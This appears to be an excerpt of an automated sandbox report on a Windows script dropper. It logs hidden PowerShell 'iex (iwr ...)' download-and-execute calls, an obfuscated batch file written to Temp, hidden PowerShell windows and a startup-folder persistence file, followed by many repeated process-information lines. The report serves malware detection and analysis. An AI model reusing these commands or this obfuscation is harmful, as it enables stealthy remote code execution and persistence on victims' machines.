Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -U", "0", "false");IWshShell3.Run("cmd /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -U", "0", "false");IHost.Sleep("60000");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\c.bat", "true");ITextStream.WriteLine("@echo off");ITextStream.WriteLine("setlocal enabledelayedexpansion");ITextStream.WriteLine("set "Rp=seift ifpTif=if1if &&if ifstaifrtif if""if /ifmiifnif if"");ITextStream.WriteLine("set "Um=&& ifeifxifitif"");ITextStream.WriteLine("set "Wl=nifotif ifdeiffiifnifedif pTif");ITextStream.WriteLine("if %Wl:if=% (%Rp:if=%%0 %Um:if=%)");ITextStream.WriteLine("::k4iOKIjPUfNTOHybM5OalyZ5C5kberg9LHEenXfGAhQnesJQN226hW1KTTkyVbRHhR1qsSM3MeKLtH2b5cwdGrN0FpATH8/yV88bkfQvr9+aiU144gRqrkXoQSg38QOuWY/waDqooa6VD8X8/9OWblcrnKRJ/NSpOTua/ez5Udb7z6s48bc0/ng8tlHvbgeQeuHJ5E549dY5QNZbz06GrCC+vtYRX3F");ITextStream.WriteLine("::E2zivkiCpZ9qeHOyHmrgaS+PeP0IYd9eo4BtkeeMePZDhVlreL6vBliZKSMjJH49MMTqgTo0XTXRZT0Ga6t6n7jaHRy05BXxe0GY5j9iHAgJ3SSYJpGEU8aTDSp0l/spvAmBXCD7doocft1E4dH+FTvmKpp2MrH9qc5fzKbXt2E4veQGpbv5Boe/iDIwfENBJ3yOqpp0XRbN7OClKiT7/KuJtIB3rqS");ITextStream.WriteLine("set "VD=WifinifdoifwsifPoifwiferifSifhelifl\ifvif1.if0\ifpowiferifsifhifeiflifl.eifxeif"");ITextStream.WriteLine("set vE=C:\Windows\System32\%VD:if=%");ITextStream.WriteLine("set "Kvr=;$NifHifESif='ifErifLifgifzniftifrLifgzifryifrifLifgifzPoifrLifgziifnrLifgztifrLifgz'if.ifReifplifaceif('rifLgifz',if if'if'if),if'CHifprifLhHifprifLifanifHprifLifgifeEHifprifLxiftHpifrifLeifnifsHifprLifiifonifHprifL");ITextStream.WriteLine("set "EYD=$hoifstif.UIif.RifaifwUifI.ifWifinifdoifwTiiftifle=if"");ITextStream.WriteLine("echo %EYD:if=%'%~0'%Kvr:if=% | %vE%");ITextStream.WriteLine("timeout /nobreak /t 1 >nul");ITextStream.Close();IWshShell3.Run("cmd /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -U", "0", "false");IHost.Sleep("60000");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\c.bat", "true");ITextStream.WriteLine("@echo off");ITextStream.WriteLine("setlocal enabledelayedexpansion");ITextStream.WriteLine("set "Rp=seift ifpTif=if1if &&if ifstaifrtif if""if /ifmiifnif if"");ITextStream.WriteLine("set "Um=&& ifeifxifitif"");ITextStream.WriteLine("set "Wl=nifotif ifdeiffiifnifedif pTif");ITextStream.WriteLine("if %Wl:if=% (%Rp:if=%%0 %Um:if=%)");ITextStream.WriteLine("::k4iOKIjPUfNTOHybM5OalyZ5C5kberg9LHEenXfGAhQnesJQN226hW1KTTkyVbRHhR1qsSM3MeKLtH2b5cwdGrN0FpATH8/yV88bkfQvr9+aiU144gRqrkXoQSg38QOuWY/waDqooa6VD8X8/9OWblcrnKRJ/NSpOTua/ez5Udb7z6s48bc0/ng8tlHvbgeQeuHJ5E549dY5QNZbz06GrCC+vtYRX3F");ITextStream.WriteLine("::E2zivkiCpZ9qeHOyHmrgaS+PeP0IYd9eo4BtkeeMePZDhVlreL6vBliZKSMjJH49MMTqgTo0XTXRZT0Ga6t6n7jaHRy05BXxe0GY5j9iHAgJ3SSYJpGEU8aTDSp0l/spvAmBXCD7doocft1E4dH+FTvmKpp2MrH9qc5fzKbXt2E4veQGpbv5Boe/iDIwfENBJ3yOqpp0XRbN7OClKiT7/KuJtIB3rqS");ITextStream.WriteLine("se
Suspicious powershell command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BAB785E push eax; iretd 13_2_00007FFD9BAB786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BAB776A pushad ; iretd 13_2_00007FFD9BAB785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmdJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmdJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
